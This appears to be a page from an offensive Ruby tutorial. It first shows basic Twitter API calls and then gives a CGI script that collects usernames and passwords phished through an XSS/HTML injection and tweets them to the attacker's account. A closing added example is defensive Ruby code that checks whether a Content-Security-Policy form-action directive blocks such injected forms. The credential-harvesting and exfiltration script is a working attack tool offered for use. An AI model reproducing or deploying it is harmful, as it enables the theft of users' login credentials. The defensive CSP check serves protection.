Working with Twitter's API is really useful for information gathering, taxonomy and social engineering. However, you need keys and tokens in order to interact with Twitter's APIs. To get them, please refer to the official Twitter development page.
Install Twitter API gem
gem install twitter
Basic Usage
rubyfu-tweet.rb
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
#
require 'twitter'
require 'pp'

client = Twitter::REST::Client.new do |config|
  config.consumer_key        = "YOUR_CONSUMER_KEY"
  config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  config.access_token        = "YOUR_ACCESS_TOKEN"
  config.access_token_secret = "YOUR_ACCESS_SECRET"
end

puts client.user("Rubyfu")                                       # Fetch a user
puts client.update("@Rubyfu w00t! #Rubyfu")                      # Tweet (as the authenticated user)
puts client.follow("Rubyfu")                                     # Follow User (as the authenticated user)
puts client.followers("Rubyfu")                                  # Fetch followers of a user
puts client.followers                                            # Fetch followers of current user
puts client.status(649235138585366528)                           # Fetch a particular Tweet by ID
puts client.create_direct_message("Rubyfu", "Hi, I'm KINGSABRI") # Send direct message to a particular user

Your turn, tweet to @Rubyfu using the above example. Tweet your code and output to @Rubyfu.
Building Stolen Credentials notification bot
We're exploiting an XSS/HTML injection vulnerability and tricking users into entering their username and password. The idea is that we'll make a CGI script that takes those stolen credentials and then tweets them to us as a notification or log system.
#!/usr/bin/ruby -w
require 'cgi'
require 'uri'
require 'twitter'

cgi = CGI.new
puts cgi.header

user = CGI.escape cgi['user']
pass = CGI.escape cgi['pass']
time = Time.now.strftime("%D %T")

client = Twitter::REST::Client.new do |config|
  config.consumer_key        = "YOUR_CONSUMER_KEY"
  config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  config.access_token        = "YOUR_ACCESS_TOKEN"
  config.access_token_secret = "YOUR_ACCESS_SECRET"
end
client.user("KINGSABRI")

if cgi.referer.nil? or cgi.referer.empty?
    # Twitter notification | WARNING! It's tweets, make sure your account is protected!!!
    client.update("[Info] No Referer!\n" + "#{CGI.unescape user}:#{CGI.unescape pass}")
else
    client.update("[Info] #{cgi.referer}\n #{CGI.unescape user}:#{CGI.unescape pass}")
end

puts ""
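
Seen from the defending site, the injected login form described above only works if the browser is allowed to submit it to a foreign host. The Ruby sketch below is an added example, not part of the original page: it evaluates a Content-Security-Policy header's form-action directive against a form target. The policies, the host names shop.example, pay.example and collector.invalid, and all method names are constructed for illustration.

```ruby
require 'uri'

# CSP treats an http source as also matching the https upgrade.
def scheme_ok?(expected, actual)
  expected == actual || (expected == 'http' && actual == 'https')
end

# Match one host-source such as https://*.pay.example:443.
# Simplification: any path part of the source is ignored.
def host_source_matches?(src, page, target)
  m = src.match(%r{\A(?:([a-z][a-z0-9+.-]*)://)?(\*\.)?([^/:]+)(?::(\d+|\*))?})
  return false unless m
  scheme, wildcard, host, port = m.captures
  host_ok = wildcard ? target.host.end_with?(".#{host}") : target.host == host
  port_ok = port ? (port == '*' || port.to_i == target.port) :
                   target.port == target.default_port
  scheme_ok?(scheme || page.scheme, target.scheme) && host_ok && port_ok
end

def source_matches?(src, page, target)
  case src
  when "'none'" then false
  when "'self'"
    [page.scheme, page.host, page.port] == [target.scheme, target.host, target.port]
  when '*' then %w[http https].include?(target.scheme)
  when /\A([a-z][a-z0-9+.-]*):\z/ then scheme_ok?($1, target.scheme)
  else host_source_matches?(src, page, target)
  end
end

# True when a page at page_url, served with the CSP header value `csp`,
# is allowed to submit a form to action_url (absolute URLs assumed).
def form_post_allowed?(csp, page_url, action_url)
  directives = {}
  csp.split(';').each do |directive|
    name, *sources = directive.downcase.split
    directives[name] ||= sources if name # first occurrence of a directive wins
  end
  sources = directives['form-action']
  return true if sources.nil? # form-action does NOT fall back to default-src
  page, target = [page_url, action_url].map { |u| URI.parse(u).normalize }
  sources.any? { |src| source_matches?(src, page, target) }
end

# Constructed sample policies and hosts (not from the original page).
PAGE      = 'https://shop.example/search'
COLLECTOR = 'https://collector.invalid/cgi-bin/log.rb'
WEAK      = "default-src 'self'; script-src 'self'"
HARDENED  = "default-src 'self'; form-action 'self' https://*.pay.example"
[WEAK, HARDENED].each { |csp| puts "#{csp.inspect} -> #{form_post_allowed?(csp, PAGE, COLLECTOR)}" }
```

The WEAK policy blocks foreign scripts yet still lets an injected form post to the collector, because form-action has no default-src fallback; the HARDENED policy refuses it.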